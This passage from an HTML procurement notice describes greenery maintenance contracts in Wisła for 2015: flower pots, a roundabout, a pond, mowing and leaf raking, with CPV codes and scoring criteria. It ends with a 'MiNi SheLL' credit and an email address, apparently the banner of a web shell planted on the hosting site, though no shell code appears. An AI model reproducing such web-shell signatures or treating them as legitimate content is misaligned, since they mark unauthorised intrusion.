13. utrzymanie i pielęgnacja kwiatów w 3 donicach (bieżące usuwanie pojawiających się chwastów, podlewanie (w zależności od warunków pogodowych), nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów i usuniętych roślin oraz ich części, ochrona przed szkodnikami i chorobami) wymiary donic: wys. 60cm, śred. 78cm)
14. utrzymanie i pielęgnacja ronda (plewienie, usuwanie zanieczyszczeń, wiosenne przycinanie i formowanie krzewów) ok. 160 m2
15. pielęgnacja oczka wodnego wraz z terenem przyległym- wymiana wody (3x) wraz z czyszczeniem kamienia, (powierzchnia lustra wody wynosi ok. 208 m2).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.30.00-7, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Czas reakcji na interwencję telefoniczną wykonania każdej z usług będących w zakresie przedmiotu umowy. - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mechaniczne koszenie trawników, poboczy i nieużytków na terenie miasta Wisły w roku 2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> .mechaniczne koszenie trawników (zgodnie z wykazem w Tabeli nr 1 SIWZ 5.III) oraz koszenie poboczy i nieużytków + rozgarnianie kretowisk+ grabienie i wywóz skoszonej trawy+ w tym wycinka krzaków i samosiewów, przycinanie gałęzi. W zależności od warunków atmosferycznych średnio 10 razy w sezonie wegetacyjnym przy założeniu, że wysokość skoszonej trawy nie może przekraczać 5-7 cm. Powierzchnia ok. 49.360m2.
2.jesienne grabienie liści z trawników, skupin, alejek, ( w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów (zgodnie z wykazem w Tabeli nr 2 SIWZ 5.III). Powierzchnia ok 28.760m2.
3.Utrzymanie ścieżek i chodników w Skate Parku- grabienie liści i zanieczyszczeń, niszczenie mchu i chwastów, wywóz materiałów. Powierzchnia ok. 500m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Czas reakcji na interwencję telefoniczną wykonania każdej z usług będących w zakresie przedmiotu umowy. - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com